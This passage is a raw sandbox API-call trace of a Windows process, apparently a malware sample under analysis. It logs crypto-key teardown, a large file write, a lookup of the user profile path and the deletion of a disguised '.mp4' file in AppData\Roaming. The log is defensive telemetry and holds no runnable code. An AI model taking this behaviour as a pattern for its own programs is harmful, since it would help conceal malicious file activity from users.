lpsz="A0000901A0E") returned 0xb [0112.822] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0112.822] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0112.822] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0112.822] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0112.822] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0112.822] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0112.822] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0112.822] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0112.822] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0112.822] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0112.822] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0112.823] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0112.823] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0112.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.830] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.830] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.830] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.830] WriteFile (in: hFile=0x4ec, lpBuffer=0x2a8f1b0*, nNumberOfBytesToWrite=0x15078, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a8f1b0*, lpNumberOfBytesWritten=0x8cf5e4*=0x15078, lpOverlapped=0x0) returned 1 [0112.834] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.834] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.834] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0112.834] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0112.834] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0112.834] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0112.886] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0112.886] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0112.887] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0112.887] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0112.887] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0112.887] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0112.887] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0112.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa390, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0112.887] CryptDestroyKey (hKey=0x9a4880) returned 1 [0112.887] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0112.887] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0112.887] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0112.887] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0112.887] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0112.887] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0112.887] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0112.887] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0112.887] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0112.887] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0112.887] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0112.887] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0112.887] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0112.887] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0112.888] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0112.888] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0112.888] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0112.888] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0112.888] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0112.888] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0112.888] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0112.888] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0112.888] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0112.888] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.888] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0112.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.888] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0112.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.888] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0112.888] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0112.888] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0112.888] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0112.888] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0112.888] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0112.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.888] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0112.888] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0112.889] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0112.889] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0112.889] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0112.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.889] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0112.889] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0112.889] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0112.889] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0112.889] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0112.889] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0112.889] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0112.889] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0112.889] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0112.889] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0112.889] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0112.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f40, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0112.889] CryptReleaseContext (hProv=0x9bf330, dwFlags=0x0) returned 1 [0112.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.889] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0112.889] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0112.889] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0112.889] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0112.890] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0112.890] FreeLibrary (hLibModule=0x76390000) returned 1 [0112.890] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.890] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.890] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.890] CloseHandle (hObject=0x4b0) returned 1 [0112.890] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.890] CloseHandle (hObject=0x4ec) returned 1 [0112.893] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.894] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0112.894] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0112.894] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0112.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0112.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0112.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0112.894] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/-M_4r.mp4", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\-M_4r.mp4", lpFilePart=0x8cedf4*="-M_4r.mp4") returned 0x29 [0112.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fa80 | out: hHeap=0x2af0000) returned 1 [0112.895] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\-M_4r.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\-m_4r.mp4")) returned 0x20 [0112.895] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\-M_4r.mp4", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3294e10, ftCreationTime.dwHighDateTime=0x1d5cfb0, ftLastAccessTime.dwLowDateTime=0x93ca8640, ftLastAccessTime.dwHighDateTime=0x1d5cdd1, ftLastWriteTime.dwLowDateTime=0x93ca8640, ftLastWriteTime.dwHighDateTime=0x1d5cdd1, nFileSizeHigh=0x0, nFileSizeLow=0x15075, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="-M_4r.mp4", cAlternateFileName="")) returned 0x9a47c0 [0112.895] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\-M_4r.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\-m_4r.mp4")) returned 1 [0112.939] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3294e10, ftCreationTime.dwHighDateTime=0x1d5cfb0, ftLastAccessTime.dwLowDateTime=0x93ca8640, ftLastAccessTime.dwHighDateTime=0x1d5cdd1, ftLastWriteTime.dwLowDateTime=0x93ca8640, ftLastWriteTime.dwHighDateTime=0x1d5cdd1, nFileSizeHigh=0x0, nFileSizeLow=0x15075, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="-M_4r.mp4", cAlternateFileName="")) returned 0 [0112.939] FindClose (in: hFindFile=0x9a47c0 | out: hFindFile=0x9a47c0) returned 1 [0112.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0112.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0112.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0112.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0112.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0112.939] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0112.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0112.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0112.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0112.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0112.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0112.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0112.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0112.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0112.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0112.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0112.940] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0112.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0112.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0112.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0112.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0112.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0112.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0112.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0112.940] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0112.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0112.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0112.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0112.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0112.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0112.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0112.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0112.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0112.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0112.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0112.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0112.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0112.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0112.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0112.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0112.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0112.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0112.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0112.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0112.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0112.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0112.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0112.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0112.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0112.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0112.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0112.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0112.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0112.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0112.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0112.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0112.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0112.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0112.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0112.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0112.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0112.941] HeapFree 